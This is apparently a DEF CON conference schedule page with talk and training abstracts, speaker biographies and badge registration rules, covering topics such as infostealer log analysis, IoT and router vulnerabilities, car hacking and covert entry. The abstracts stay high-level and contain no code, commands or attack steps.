Information stealer malware is one of the most prolific and damaging threats in today’s cybercrime landscape, siphoning off everything from browser-stored credentials to session tokens. In 2024 alone, we witnessed more than 30 million stealer logs traded on underground markets. Yet buried within these logs is a goldmine: screenshots captured at the precise moment of infection. Think of it as a thief taking a selfie mid-heist, unexpected but convenient for us, right? Surprisingly, these crime scene snapshots have been largely overlooked until now. Leveraging them with Large Language Models (LLMs), we propose a new approach to identify infection vectors, extract indicators of compromise (IoCs) and track infostealer campaigns at scale. In our analysis, we will break down three distinct campaigns to illustrate their tactics to deliver malware and deceive victims.
With its live demonstration, this presentation shows how LLMs can be harnessed to extract IoCs at scale while addressing the challenges and costs of implementation. Attendees will walk away with a deeper understanding of the modern infostealer ecosystem and will want to apply LLMs to any illicit artifacts to extract actionable intelligence.
Speakers: Olivier Bilodeau, Estelle Ruellan
Olivier Bilodeau, a principal researcher at Flare, brings 15+ years of cutting-edge infosec expertise in honeypot operations, binary reverse-engineering, and RDP interception. A passionate communicator, Olivier has spoken at conferences like BlackHat, DEFCON, SecTor, Derbycon, and more. Invested in his community, he co-organizes MontréHack, is NorthSec’s President, and runs its Hacker Jeopardy.
SpeakerBio: Estelle Ruellan
Estelle is a Threat Intelligence Researcher at Flare. With a background in Mathematics and Criminology, Estelle lost her way into cybercrime and is now playing with lines of code to help computers make sense of the cyber threat landscape. She presented at conferences like ShmooCon 2025, Hack.lu 2024, eCrime APWG 2024 in Boston and the 23rd Annual European Society of Criminology Conference (EUROCRIM 2023) in Florence.
Modern SOCs are flooded with alerts yet blind to what matters. This talk shows how to auto-discover attack flows and root causes by hacking context across telemetry, logs, and threat signals. Using open-source tools and correlation logic, we’ll walk through real-world detection pipelines that stitch together events across cloud, endpoint, and network environments. You'll learn lightweight, vendor-agnostic approaches to enrich data, group alerts by incident, and make sense of security chaos — fast.
SpeakerBio: Ezz Tahoun
Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.
During the course you will:
Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.
This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.
No prior knowledge required!
Learning Objectives
Cryptocurrency exchanges have the reputation of keeping 'not your keys so not your coins', but we analyze further to understand what technology powers them and which security aspects serve users. In this hour we use tools like Helloex and Octobot to build our own experimental testnet exchange. Your team divides into exchange providers maintaining stability and opportunistic traders taking advantage of system loopholes. A group discussion finally concludes under which conditions cryptocurrency exchanges provide security and value.
Speakers: Sky Gul, Andrea
This research examines security oversights in a range of modern 4G/5G routers used in small businesses, industrial IoT, and everyday mobile deployments. Several of these routers contain vulnerabilities reminiscent of older security flaws, such as weak default credentials, inadequate authentication checks, and command injection pathways. By reverse-engineering firmware and testing for insecure endpoints, it was possible to demonstrate remote code execution, arbitrary SMS sending, and other serious exploits affecting Tuoshi and KuWFi devices.
Through practical examples, including Burp Suite requests and Ghidra disassembly, the talk highlights how these weaknesses can grant attackers root access, allow fraudulent activity, or compromise entire networks. In each case, mitigation strategies and best practices—like robust authentication, regular firmware updates, and network segmentation—are emphasized. Ultimately, this presentation underscores the importance of continuous security scrutiny, even for modern hardware, and encourages the community to stay vigilant and collaborate in uncovering and addressing such pervasive vulnerabilities.
Edward Warren is an Information Security Analyst and Independent Security Researcher specializing in IoT and mobile application security. Over the past few years he has discovered critical (CVSS) 0-day vulnerabilities. Edward also earned a Hall of Fame acknowledgement from the Google Play Security Reward Program (GPSRP) and attribution in numerous CVE publications. He has presented his work at conferences such as BSides and ShmooCon. When not tracking down digital bugs, Edward can be found hiking rugged trails or exploring the seas through his newfound fascination for scuba diving.
This course is a 100% hands-on deep dive into the OWASP Security Testing Guide and relevant items of the OWASP Application Security Verification Standard (ASVS), so this course covers and goes beyond the OWASP Top Ten.
Long gone are the days when web servers were run by Perl scripts and apps were written in Delphi. What is common between Walmart, eBay, PayPal, Microsoft, LinkedIn, Google and Netflix? They all use Node.js: JavaScript on the server.
Modern Web apps share traditional attack vectors and also introduce new opportunities to threat actors. This course will teach you how to review modern web apps, showcasing Node.js but using techniques that will also work against any other web app platform. Ideal for Penetration Testers, Web app Developers as well as everybody interested in JavaScript/Node.js and Modern app stack security.
Get a FREE taste for this training, including access to video recording, slides and vulnerable apps to play with:
1 hour workshop - https://7asecurity.com/free-workshop-web-apps
All action, no fluff: improve your security analysis workflow and immediately apply these gained skills in your workplace. Packed with exercises, extra mile challenges and a CTF, self-paced and suitable for all skill levels, with continued education via unlimited email support, lifetime access, step-by-step video recordings and interesting apps to practice on, including all future updates for free.
Speakers: Abraham Aranguren, Anirudh Anand, Ashwin Shenoi
After 17 years in itsec and 24 in IT, Abraham Aranguren is now the CEO of 7ASecurity (7asecurity.com), a company specializing in penetration testing of web/mobile apps, infrastructure, code reviews and training. Co-Author of the Mobile, Web and Desktop (Electron) app 7ASecurity courses. Security Trainer at Blackhat USA, HITB, OWASP Global AppSec and many other events. OWASP OWTF project leader, an OWASP flagship project (owtf.org), Major degree and Diploma in Computer Science, some certs: CISSP, OSCP, GWEB, OSWP, CPTS, CEH, MCSE:Security, MCSA:Security, Security+. As a shell scripting fan trained by unix dinosaurs, Abraham wears a proud manly beard. He writes on Twitter as @7asecurity @7a_ @owtfp or https://7asecurity.com/blog. Multiple presentations, pentest reports and recordings can be found at https://7asecurity.com/publications.
SpeakerBio: Anirudh Anand
Anirudh Anand is a security researcher with a primary focus on Web and Mobile Application Security. He is currently working as a Principal Security Engineer at CRED and also Security Trainer at 7asecurity. He has been submitting bugs and contributing to security tools for over 9 years. In his free time, he participates in CTF competitions along with Team bi0s (#1 security team in India according to CTFtime). His bounties involve vulnerabilities in Google, Microsoft, LinkedIn, Zendesk, Sendgrid, Gitlab, Gratipay and Flipboard.
Anirudh is an open source enthusiast and has contributed to several OWASP projects with notable contributions being in OWTF and Hackademic Challenges Project. He has presented/trained in a multitude of conferences including BlackHat US 2020, OWASP NZ 2021, HackFest CA 2021, c0c0n 2019, BlackHat Arsenal 2019, BlackHat Europe Arsenal 2018, HITB Dubai 2018, Offzone Moscow 2018, Ground Zero Summit Delhi 2015 and Xorconf 2015.
SpeakerBio: Ashwin Shenoi
Ashwin Shenoi is an avid application security enthusiast who currently works as a Senior Security Engineer at CRED and likes to break into applications and automate stuff. He is part of team bi0s, the top ranked CTF team according to CTFTime. He heads the Web Security team at team bi0s and is also the core challenge setter and organiser of the various editions of InCTF and the other CTFs organised by team bi0s. He has also presented talks in various security meet-ups and conferences including BlackHat Asia and BlackHat USA. He does a fair share of breaking into open source applications and services and has also been awarded several CVEs for the same.
This course is a 100% hands-on deep dive into the OWASP Security Testing Guide and relevant items of the OWASP Application Security Verification Standard (ASVS), so this course covers and goes beyond the OWASP Top Ten.
Long are the days since web servers were run by perl scripts apps written in Delphi. What is common between Walmart, eBay, PayPal, Microsoft, LinkedIn, Google and Netflix? They all use Node.js: JavaScript on the server.
Modern Web apps share traditional attack vectors and also introduce new opportunities to threat actors. This course will teach you how to review modern web apps, showcasing Node.js but using techniques that will also work against any other web app platform. Ideal for Penetration Testers, Web app Developers as well as everybody interested in JavaScript/Node.js and Modern app stack security.
Get a FREE taste for this training, including access to video recording, slides and vulnerable apps to play with:
1 hour workshop - https://7asecurity.com/free-workshop-web-apps
All action, no fluff, improve your security analysis workflow and immediately apply these gained skills in your workplace, packed with exercises, extra mile challenges and CTF, self-paced and suitable for all skill levels, with continued education via unlimited email support, lifetime access, step-by-step video recordings and interesting apps to practice, including all future updates for free.
Speakers: Abraham Aranguren, Anirudh Anand, Ashwin Shenoi
SpeakerBio: Abraham Aranguren
After 17 years in itsec and 24 in IT, Abraham Aranguren is now the CEO of 7ASecurity (7asecurity.com), a company specializing in penetration testing of web/mobile apps, infrastructure, code reviews and training. Co-Author of the Mobile, Web and Desktop (Electron) app 7ASecurity courses. Security Trainer at Blackhat USA, HITB, OWASP Global AppSec and many other events. OWASP OWTF project leader, an OWASP flagship project (owtf.org), Major degree and Diploma in Computer Science, some certs: CISSP, OSCP, GWEB, OSWP, CPTS, CEH, MCSE:Security, MCSA:Security, Security+. As a shell scripting fan trained by unix dinosaurs, Abraham wears a proud manly beard. He writes on Twitter as @7asecurity @7a_ @owtfp or https://7asecurity.com/blog. Multiple presentations, pentest reports and recordings can be found at https://7asecurity.com/publications.
SpeakerBio: Anirudh Anand
Anirudh Anand is a security researcher with a primary focus on Web and Mobile Application Security. He is currently working as a Principal Security Engineer at CRED and also Security Trainer at 7asecurity. He has been submitting bugs and contributing to security tools for over 9 years. In his free time, he participates in CTF competitions along with Team bi0s (#1 security team in India according to CTFtime). His bounties involve vulnerabilities in Google, Microsoft, LinkedIn, Zendesk, Sendgrid, Gitlab, Gratipay and Flipboard.
Anirudh is an open source enthusiast and has contributed to several OWASP projects with notable contributions being in OWTF and Hackademic Challenges Project. He has presented/trained in a multitude of conferences including BlackHat US 2020, OWASP NZ 2021, HackFest CA 2021, c0c0n 2019, BlackHat Arsenal 2019, BlackHat Europe Arsenal 2018, HITB Dubai 2018, Offzone Moscow 2018, Ground Zero Summit Delhi 2015 and Xorconf 2015.
SpeakerBio: Ashwin Shenoi
Ashwin Shenoi is an avid application security enthusiast who currently works as a Senior Security Engineer at CRED and likes to break into applications and automate stuff. He is part of team bi0s, the top ranked CTF team according to CTFTime. He heads the Web Security team at team bi0s and is also the core challenge setter and organiser of the various editions of InCTF and the other CTFs organised by team bi0s. He has also presented talks in various security meet-ups and conferences including BlackHat Asia and BlackHat USA. He does a fair share of breaking into open source applications and services and has also been awarded several CVEs for the same.
Drawing from personal experience as a press photographer, this talk highlights the underexplored attack surface created by media access at high profile events like concerts, sporting events and political rallies. We explore how the press badge can become a powerful tool in the hands of a red teamer. By taking into account elements of OSINT, social engineering, and physical and network security, we focus on how lessons learned as a press photographer can directly be applied by red teamers (or threat actors!) to gain a foothold. Once that is achieved, individuals can embed themselves directly within high-visibility individuals and high-value, sensitive devices associated with professional sports teams, musicians and bands, and political leaders and lawmakers. The talk also discusses the importance of looking at the ‘bigger picture’, and being aware of threats where people may not consider them to come from. Inspired by the spirit of Johnny Long’s No Tech Hacking, this talk examines how low-tech, high-ingenuity approaches continue to be in a hacker's arsenal. It makes the case that media impersonation is a serious but overlooked threat vector, and one that allows attackers to bypass traditional perimeters.
Speakers: Mansoor Ahmad, Brad Ammerman
SpeakerBio: Mansoor Ahmad
Mansoor Ahmad is an offensive security practitioner who has always had a curiosity about how things worked. He studied information technology and worked as a news photographer in college. A quiet kid growing up in a foreign country, he would always accompany his father on errands and observe people's reactions to different things and the psychology behind it. This started an itch which he has been scratching since then, and that has led to a career in information security. When he's not working, eating or sleeping, Mansoor likes to practice photography and take naps.
SpeakerBio: Brad Ammerman
Brad Ammerman, a leading figure in security testing, currently serves as the Senior Director at Prescient Security. His background includes influential roles at companies like Foresite, Optiv Security, Lockheed Martin, DIA, DoD, and Supreme Court of Nevada, where he developed his expertise in offensive security and team management. A skilled hacker himself, Brad is also a recognized speaker, educator, mentor, and disabled veteran, dedicated to teaching and protecting others. He takes great pride in his roles as a devoted husband and father.
In today's bug bounty landscape, advantage goes to those who can see what others miss. The OWASP Amass Project has long equipped researchers with powerful tools for internet asset discovery, but its newest addition—assoc—takes things to the next level. This talk introduces assoc, a tool that allows hunters to explore the Open Asset Model through custom association triples, a concept inspired by RDF triples used in knowledge graphs. These user-defined relationships enable highly targeted queries across a rich graph of internet data, revealing non-obvious associations between domains, IP addresses, certificates, and legal entities.
SpeakerBio: Jeff "caffix" Foley, Founder & Project Leader, OWASP AMASS at OWASP
Jeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.
There is a creature that lives inside our smartphones, laptops, and PCs, quietly driving their most cutting-edge behaviors. Much larger versions of it hide in datacenters around the world, constantly crunching through massive computation problems. And yet, even experienced engineers find it mysterious. Originally made to boost graphics performance, it has evolved into the engine that powers technologies behind systems like Claude and ChatGPT. In this workshop, we will uncover the nature of this creature: the GPU. Starting with its history and evolution, we will explore how a processor meant to accelerate 3D graphics became the driving force behind modern machine learning and AI. Along the way, we will dive into the design and behavior of neural networks, and discover how a machine built for graphics rendering learned to interpret images and speak human language. Finally, we will investigate how the complexity of neural networks made possible by GPUs can lead to unexpected and strange behaviors... some of which may not be accidental.
SpeakerBio: eigentourist
Eigentourist is a programmer who learned the craft in the early 1980s. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it's hard to tell which was which. Today, he works on systems integration and engineering in the healthcare industry.
We're going to explore how OBD-II emissions testing works and how you might go about convincing the scanner that everything is fine.
SpeakerBio: Archwisp
Long-time tech nerd, car enthusiast, and hardware hacker
As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.
Participants will learn:
Kamel Ghali is an 8-year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.
What threats are hidden in network traffic? In this hands-on course, we’ll show you how to spot malicious activity hiding in plain sight. Learn how to filter noise, detect C2 traffic, and uncover stealthy attacks using real-world packet captures. Whether you're into blue teaming, incident response, or just love dissecting packets, this session will sharpen your network forensics skills!
SpeakerBio: Chris Greer, Packet Analyst
Chris is a Packet Analyst at Packet Pioneer, specializing in network performance analysis and forensics using Wireshark. Whether he's investigating complex issues at the packet level or leading hands-on training sessions, Chris is passionate about helping others master the art of packet analysis.
As a certified instructor and active contributor to the Wireshark Foundation, he regularly teaches interactive Wireshark courses for audiences of all sizes. Chris also shares bite-sized tips, analysis techniques, and troubleshooting strategies on his YouTube channel—making network forensics more accessible to analysts at every level.
Origins of Hard Hat Brigade (why), the who / what / how
Speakers: MrBill, M0nkeyDrag0n, Hydrox, CoD_Segfault
This comprehensive course is designed for developers and cybersecurity professionals seeking to harness the power of Generative AI and Large Language Models (LLMs) to enhance software security and development practices. Participants will gain a deep understanding of LLM functionality, strengths, and weaknesses, and learn to craft effective prompts for diverse use cases. The curriculum covers essential topics such as embeddings, vector stores, and Langchain, offering insights into document loading, code analysis, and custom tool creation using Agent Executors.
Course highlights:
Seth utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
SpeakerBio: Ken Johnson, Co-Founder and CTO at DryRun SecurityKen utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
Have I Been Ransomed? is a specialized security service, akin to Have I Been Pwned, designed to detect personal data exposure specifically from ransomware leaks. As ransomware attacks increasingly involve data theft and public dumping, individuals need a way to check if their personally identifiable information has been compromised. Our platform goes beyond standard database checks by processing a wide array of leaked file types, including PDFs, documents, and text files. We employ advanced optical character recognition coupled with sophisticated large language models to meticulously scan unstructured data and extract sensitive identifiers such as national ID cards, driver’s licenses, and social security numbers. Have I Been Ransomed? provides critical awareness, empowering users to discover if their sensitive information has been exposed in a ransomware incident and enabling them to take proactive steps against potential identity theft and fraud.
SpeakerBio: Juanma "M4C" Tejada
Juanma is a telecommunications engineer with a profound passion for drone technology and the complexities of hacking. His journey into the cybersecurity realm began unconventionally. Initial explorations through various online forums, driven by early curiosities, unexpectedly ignited a deep interest in the mechanics of data leaks, system breaches, and the evolving tactics of ransomware groups. This non-traditional path provided firsthand exposure to the cyber underground, equipping him with practical, real-world insights into attacker motivations and methodologies. This unique background grants him a grounded perspective, making him well-qualified to discuss the practical applications and implications within the current cybersecurity landscape.
In this talk, we dive into a world of webcams that secretly run Linux. What started as a casual curiosity turned into a deep dive into embedded Linux systems, obscure supply chains, and alarming security oversights.
Along the way, we discovered how decisions made far upstream – by silicon vendors and OEMs – can introduce vulnerabilities that quietly ship in tens of thousands of devices.
This presentation explores the broader implications of insecure firmware, broken update mechanisms, and the surprising autonomy of devices many assume to be simple peripherals.
We share how we traced the tech stack from brand-name distributors back to little-known chipset manufacturers, and what that journey revealed about responsibility, transparency, and the risks of neglecting security at the hardware-software boundary.
Come for curiosity, stay for the demos and laughs.
Speakers: Mickey Shkatov, Jesse Michael
SpeakerBio: Mickey Shkatov
Mickey has been involved in security research for over a decade, specializing in breaking down complex concepts and identifying security vulnerabilities in unusual places. His experience spans a variety of topics, which he has presented at security conferences worldwide. His talks have covered areas ranging from web penetration testing to the intricacies of BIOS firmware.
SpeakerBio: Jesse Michael
Jesse is an experienced security researcher focused on vulnerability detection and mitigation who has worked at all layers of modern computing environments, from exploiting worldwide corporate network infrastructure down to hunting vulnerabilities inside processors at the hardware design level. His primary areas of expertise include reverse engineering embedded firmware and exploit development. He has also presented research at DEF CON, Black Hat, PacSec, Hackito Ergo Sum, Ekoparty, and BSides Portland.
As digital systems increasingly control the world’s most powerful machines, software failures have become a silent but deadly threat—sometimes with fatal consequences. This DEFCON presentation dives deep into maritime and military incidents where software errors, automation missteps, and human-computer interface flaws have led to catastrophic outcomes. Reviewing the USS Yorktown’s infamous “Smart Ship” crash and the USS Vincennes’ tragic misidentification of a civilian airliner, we dissect how code, configuration, and design choices can escalate into life-or-death situations at sea. We’ll also draw parallels to high-profile aviation incidents like the Boeing 737 Max and F-35, illustrating common threads in software assurance failures across domains. We’ll walk through how a subtle software flaw could be exploited to disrupt critical vessel operations, and what this means for the future of maritime cybersecurity. Attendees will gain insight into the technical, organizational, and ethical challenges of securing mission-critical systems, and leave with practical takeaways for hackers, engineers, and policymakers seeking to prevent the next digital disaster on the high seas.
Speakers: Michael DeVolld, Austin Reid
SpeakerBio: Michael DeVolld
With 25 years of experience in the maritime sector, Michael is dedicated to ensuring the safety and security of the global Maritime Transportation System (MTS). A retired US Coast Guard Officer, he has conducted numerous safety and compliance inspections, investigated high-profile marine casualties, and established a cybersecurity program at USCG Cyber Command. Previously, as a Business Information Security Officer for Royal Caribbean Group, Michael developed strategies to maintain the cybersecurity and regulatory compliance of the company's global cruise fleet. Holding a B.S. in Computer Science and an M.S. in Telecommunications, he currently serves as ABS Consulting's Maritime Cybersecurity Director. In this role, he specializes in managing cyber risks, implementing technical solutions, shaping policy and governance, providing expert advisory services, and designing custom solutions to meet maritime regulatory requirements and best practices.
SpeakerBio: Austin Reid, ABS Group
Austin Reid is a senior consultant at ABS Consulting specializing in securing maritime operational technology, with 10 years' experience in the maritime sector spanning breakbulk, automated container terminal operations, and securing critical vessel systems for all types of ships. He is also a hacker and security researcher specializing in maritime navigation control systems.
Welcome to the “fun” world of IoT, where security is often an afterthought and vulnerabilities lurk around every corner. This presentation is a guide for vendors on what not to do when designing IoT devices and a survival manual for users to spot insecure gadgets.
Ever wondered if your IoT device is spilling your home WiFi secrets to the cloud over HTTP? Spoiler alert: maybe :)
Pairing your device over open WiFi and HTTP while providing your home WiFi credentials? Just to vacuum clean your home?
How about IoT devices lying about their Android version? But don’t worry, it already comes with malware pre-infected.
Wouldn’t it be nice to access the clear-text admin passwords before authentication? How about multiple different ways to do that?
Would you like to see the reverse engineering of an N-day command injection vulnerability in the login form of a popular NAS device?
What could be the easiest way to figure out the (static) AES encryption key for a home security alarm solution? Just RTFM!
Why bother with memory corruption when command injection is still the king of IoT threats? I'll break it down for you, with an analysis of challenges with scalable IoT memory corruption exploits, and the challenges with blind ROP.
Last but not least, let’s discuss why Busybox is “not the best” choice for IoT development.
Zoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.
I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.
"How NOT to Perform a Covert Entry Assessment" is a no B.S. discussion that covers what not to do during covert entry engagements--highlighting real-world mistakes, busted Hollywood myths, and missteps that compromise success. We’ll walk through effective techniques for physical site surveys, face-to-face social engineering, and real-time troubleshooting when things go sideways. Attendees will be encouraged to share experiences and lessons learned in an open, interactive format. We’ll also demo our covert entry tools, and discuss how to deliver reliable results to both commercial and high-security government clients.
Speakers: Brent White, Tim Roberts
SpeakerBio: Brent White
Brent is a Sr. Principal Security Consultant / Covert Entry Specialist with Dark Wolf Solutions, specializing in social engineering and Red Team-style security assessments for both commercial and Department of Defense clients, as well as his contributions towards the development of the drone hacking methodology for the Defense Innovation Unit's "Blue sUAS" initiative. He also served as a trusted adviser for the TN Dept of Safety and Homeland Security on the topic of physical and cyber security and has held the role of Web/Project Manager and IT Security Director for a global franchise company as well as Web Manager and information security positions for multiple TV personalities.
He has also been interviewed on the popular web series, “Hak5” with Darren Kitchen, Security Weekly, BBC News, featured with Tim Roberts on the popular series "ProfilingEvil" by Mike King, and on Microsoft’s “Roadtrip Nation” television series. His experience includes Internal/External Penetration, Network evasion, Wireless, Web Application, Drone and Physical Security assessments, and Social Engineering.
Brent has also spoken at numerous security conferences, including ISSA International, DEF CON, Black Hat, DerbyCon, multiple "B-Sides" conference events, Appalachian Institute of Digital Evidence conference at Marshall University, and many more.
SpeakerBio: Tim Roberts, WeHackPeople.com / Dark Wolf Solutions
Tim is a Covert Entry Specialist with Dark Wolf Solutions and Sr. Principal Penetration Tester. He is the founding member of the Lexington DEF CON group (DC859). He has been interviewed on the subject of “White hat hacking” for Microsoft’s “Roadtrip Nation” television series, was featured on IDG Enterprise’s CSO Online publication by Ryan Francis on social engineering, and was interviewed at Black Hat by HelpNetSecurity on security awareness and “Know Your Adversary”. He and Brent White have also been featured a couple of times on the true crime series Profiling Evil with Mike King.
Tim has over fifteen years of professional security experience and has held management, IT, and physical security roles across multiple industries, including healthcare, finance, and government. His experience includes Red Team, Internal/External Network, Wireless, Application, Physical Security, Social Engineering, and more.
Tim has spoken and conducted training at numerous security and hacker conferences, including ISSA International, DEF CON, DerbyCon, NolaCon, various B-Sides, CircleCityCon, Techno Security Con, SaintCon, Appalachian Institute of Digital Evidence at Marshall University, Who’s Your Hacker, was keynote for the S&H Law – FBI/Hacker Panel, and more. By continuing to share these experiences, he hopes to further contribute to the InfoSec community and security awareness as a whole.
Security research has been focused on securing well-known, widely replicated ecosystems where problems and solutions are shared across the industry. But what happens when you build something no one else has? How do you secure an architecture that's both proprietary and deployed at billion-core scale?
In 2016, NVIDIA began transitioning its internal Falcon microprocessor, used in nearly all GPU products, to a RISC-V based architecture. Today, each chipset has 10-40 cores, and in 2024, NVIDIA surpassed 1 billion RISC-V cores shipped. This success came with unique security challenges, ones that existing models couldn't solve.
To address them, we created a custom SW and HW security architecture from scratch, including a purpose-built Separation Kernel SW, novel RISC-V ISA extensions like Pointer Masking and IOPMP (later ratified), and a unique secure boot and attestation solution. But how do you future-proof a proprietary ecosystem against tomorrow's threats?
In this talk, we'll share what we learned, and what's next. From HW-assisted memory safety (HWASAN, MTE) to control-flow integrity (CFI) and CHERI-like models, we'll explore how NVIDIA is preparing not only its RISC-V ecosystem for the evolving threat landscape. If you care about real-world security at an unprecedented scale, this is a journey you won't want to miss.
Adam ‘pi3’ Zabrocki is a Director of Offensive Security at NVIDIA and specializes in low-level security research. He created the Linux Kernel Runtime Guard (LKRG) project, now developed under Openwall, and has worked at Microsoft, the European Organization for Nuclear Research (CERN), HISPASEC Sistemas (virustotal.com), Wroclaw Center for Networking and Supercomputing, Cigital and more. Adam has contributed to numerous projects, found vulnerabilities in various systems (including Hyper-V, KVM, RISC-V ISA, Intel's Reference Code, Intel/NVIDIA vGPU, Linux kernel, FreeBSD, OpenSSH, gcc SSP/ProPolice, Apache), and published research in Phrack Magazine. He serves as Vice-Chair of the RISC-V J-extension group and has developed key security extensions for RISC-V (Pointer Masking/HWASAN, Control Flow Integrity), and is currently working on Memory Tagging. Coauthor of Windows Internals and twice nominated for The Pwnie Awards, he has spoken at major security conferences such as Black Hat, DEF CON, Security BSides, and more.
SpeakerBio: Marko Mitic
Marko is a Software Security Architect and System Software Manager focused on secure system design and product security, currently managing NVIDIA’s Core RISC-V team. For the past 10 years at NVIDIA he has worked on designing key security aspects of the core system software architecture and driven offensive security practices for GPU system software. He was Security and Risk Officer and PSIRT lead responsible for driving and tracking PSIRT issues and developing remediation plans. In recent years, his focus has been RISC-V, where he has been driving NVIDIA’s RISCV security architecture and implementation, bringing NVRISCV TEE to fruition in shipping NVIDIA products. Motivated by incident response experience, he now passionately leads the adoption of Ada/SPARK, a formally verifiable programming language, as a powerful tool for reducing security risks in NVIDIA’s most critical software components.
Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.
A badge is required for each human age 8 and older.
You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.
Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)
Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.
Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.
You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked up on-site -- they will not be mailed or shipped.
We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.
If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.
Online purchases are provided a receipt via email when the purchase is made.
Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.
Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.
There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.
We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.
If you attend BlackHat, it is possible to purchase a DEF CON badge with your BlackHat registration. If you did so, please get your DEF CON badge from BlackHat before they close.
BlackHat should send you an email with instructions for how to obtain your DEF CON badge. In case you missed it, you can go to the second floor, at the concierge desk, halfway down Black Hat Blvd.
Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.
If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(
If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.
